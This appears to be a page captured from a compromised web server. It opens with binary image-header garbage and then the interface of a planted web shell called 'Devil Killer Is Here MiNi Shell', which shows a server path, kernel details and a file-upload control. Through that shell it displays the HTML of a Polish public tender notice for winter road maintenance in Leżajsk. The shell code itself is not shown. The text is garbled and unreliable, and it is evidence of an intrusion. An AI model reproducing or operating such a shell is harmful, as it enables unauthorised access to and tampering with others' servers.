JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250728/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250728/0034780701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie 2025/2026 część 1, 2, 3&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W LEŻAJSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690587410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Polna 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leżajsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontakt@zdplezajsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zdplezajsk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie 2025/2026 część 1, 2, 3&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-04194ead-e2a6-4aeb-b426-79e77b53d0e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00347807</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00000212/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa związana z zimowym utrzymaniem dróg powiatowych w sezonie 2025/2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_lezajsk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zdp_lezajsk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 roku o świadczeniu usług drogą elektroniczną.<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w pkt 8.1 składa się, pod<br/>rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>3. W przedmiotowym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem strony https://platformazakupowa.pl/pn/zdp_lezajsk zwanej dalej Platformą. Wykonawcy winni zapoznać się z regulaminem Platformy, znajdującym się na stronie https://platformazakupowa.pl/strona/1-regulamin, oraz Instrukcjami dla<br/>Wykonawców (link: https://platformazakupowa.pl/strona/45-instrukcje ), w którym zawarto wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, powinien posiadać konto na Platformie. Rejestracja i konto na Platformie jest darmowe. Sposób założenia konta opisany został w instrukcji znajdującej się pod linkiem: https://docs.google.com/document /d/1CETIe4hPE_fnKCUjWGpnw9yWhdbtc0YTlqtgUxMAwRo/edit<br/>Wykonawca posiadający konto na Platformie ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>Pozostałe wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej zawarte są w pkt 11 rozdziału SWZ.<br/>W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.<br/>Formaty plików muszą być zgodne z krajowymi Ramami Interoperacyjności, o których mowa w Rozporządzeniu Rady Ministrów z dn.<br/>12.04.2012 w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jednolity Dz. U. z 2017 r. poz. 2247).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/zdp_lezajsk</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (pkt. 24 SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (pkt. 24 SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.231.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi zimowego utrzymania dróg powiatowych przy odśnieżaniu i usuwaniu śliskości na drogach powiatu leżajskiego w sezonie zimowych 2024/2025<br/>Część 1 – Zwalczanie śliskości i odśnieżanie podstawioną przez usługodawcę pługo-piaskarką na samochodzie z napędem co najmniej na dwie osie o ładowności 8-16 t (komplet usługodawcy) oraz załadunek materiału uszorstniającego na terenie bazy materiałowej ZDP Leżajsk ul. Polna w Leżajsku<br/>(trasy nr 7,8,9,10 zgodnie z załącznikiem nr 7 do SWZ)<br/>Szczegółowy opis przedmiotu zamówienia przedstawiony został w Rozdziale III SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług zamówienia,<br/>polegającego na powtórzeniu podobnych usług, stanowiących nie więcej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem niniejszego zamówienia (w szczególności: zwalczanie śliskości oraz odśnieżanie podstawioną przez usługodawcę pługo-piaskarką na samochodzie z napędem co najmniej na dwie osie o ładowności 8-16 t). Zamówienie zostanie udzielone, gdy<br/>zaistnieje uzasadniona potrzeba i możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten cel. Wysokość wynagrodzenia zamówienia polegającego na powtórzeniu podobnych usług zostanie ustalona w drodze negocjacji z Wykonawcą. Zamówienie zostanie udzielone dotychczasowemu Wykonawcy pod warunkiem, że: zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu<br/>podobnych usług – zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty, stosując następujące kryteria:<br/>• Cena – 60 pkt<br/>• Czas reakcji – 40 pkt<br/>2. Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia wpisanej<br/>przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W<br/>przypadku kryterium „Cena”(C) - oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>3. Zasady oceny kryterium czasu reakcji<br/>Czas reakcji - wskaźnik R dla części od 1 do 3 - czas rozpoczęcia pracy od zawiadomienia telefonicznego przez Zamawiającego.<br/>R - liczba punktów uzyskanych przez ofertę w kryterium czasu rozpoczęcia pracy lub załadunku mieszanki od zawiadomienia<br/>telefonicznego przez Zamawiającego (max – 40 pkt.)<br/>R:<br/>0 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego powyżej 2 godzin,<br/>20 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego powyżej 1 godziny do 2 godzin,<br/>40 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego do 1 godziny.<br/>4. Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie ze wzorem:<br/>P= C + R<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>R – liczba punktów uzyskanych w kryterium „Czas reakcji”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt<br/>4.1. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>4.2. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi zimowego utrzymania dróg powiatowych przy odśnieżaniu i usuwaniu śliskości na drogach powiatu leżajskiego w sezonie zimowych 2024/2025<br/>Część 2 – Zwalczanie śliskości i odśnieżanie podstawioną przez usługodawcę pługo-piaskarką na samochodzie z napędem co najmniej na dwie osie o ładowności 8-16 t (komplet usługodawcy) oraz załadunek materiału uszorstniającego na terenie bazy materiałowej ZDP Leżajsk ul. Polna w Leżajsku<br/>(trasy nr 1,2,11 zgodnie z załącznikiem nr 7 do SWZ)<br/>Szczegółowy opis przedmiotu zamówienia przedstawiony został w Rozdziale III SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług zamówienia,<br/>polegającego na powtórzeniu podobnych usług, stanowiących nie więcej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem niniejszego zamówienia (w szczególności: zwalczanie śliskości oraz odśnieżanie podstawioną przez usługodawcę pługo-piaskarką na samochodzie z napędem co najmniej na dwie osie o ładowności 8-16 t). Zamówienie zostanie udzielone, gdy<br/>zaistnieje uzasadniona potrzeba i możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten cel. Wysokość wynagrodzenia zamówienia polegającego na powtórzeniu podobnych usług zostanie ustalona w drodze negocjacji z Wykonawcą. Zamówienie zostanie udzielone dotychczasowemu Wykonawcy pod warunkiem, że: zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu<br/>podobnych usług – zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty, stosując następujące kryteria:<br/>• Cena – 60 pkt<br/>• Czas reakcji – 40 pkt<br/>2. Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia wpisanej<br/>przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W<br/>przypadku kryterium „Cena”(C) - oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>3. Zasady oceny kryterium czasu reakcji<br/>Czas reakcji - wskaźnik R dla części od 1 do 3 - czas rozpoczęcia pracy od zawiadomienia telefonicznego przez Zamawiającego.<br/>R - liczba punktów uzyskanych przez ofertę w kryterium czasu rozpoczęcia pracy lub załadunku mieszanki od zawiadomienia<br/>telefonicznego przez Zamawiającego (max – 40 pkt.)<br/>R:<br/>0 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego powyżej 2 godzin,<br/>20 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego powyżej 1 godziny do 2 godzin,<br/>40 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego do 1 godziny.<br/>4. Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie ze wzorem:<br/>P= C + R<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>R – liczba punktów uzyskanych w kryterium „Czas reakcji”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt<br/>4.1. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>4.2. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi zimowego utrzymania dróg powiatowych przy odśnieżaniu i usuwaniu śliskości na drogach powiatu leżajskiego w sezonie zimowych 2024/2025<br/>Część 3 – Zwalczanie śliskości i odśnieżanie podstawioną przez usługodawcę pługo-piaskarką na samochodzie z napędem co najmniej na dwie osie o ładowności 8-16 t (komplet usługodawcy) oraz załadunek materiału uszorstniającego na terenie bazy materiałowej ZDP Leżajsk ul. Polna w Leżajsku<br/>(trasy nr 3,4,5,6 zgodnie z załącznikiem nr 7 do SWZ)<br/>Szczegółowy opis przedmiotu zamówienia przedstawiony został w Rozdziale III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> 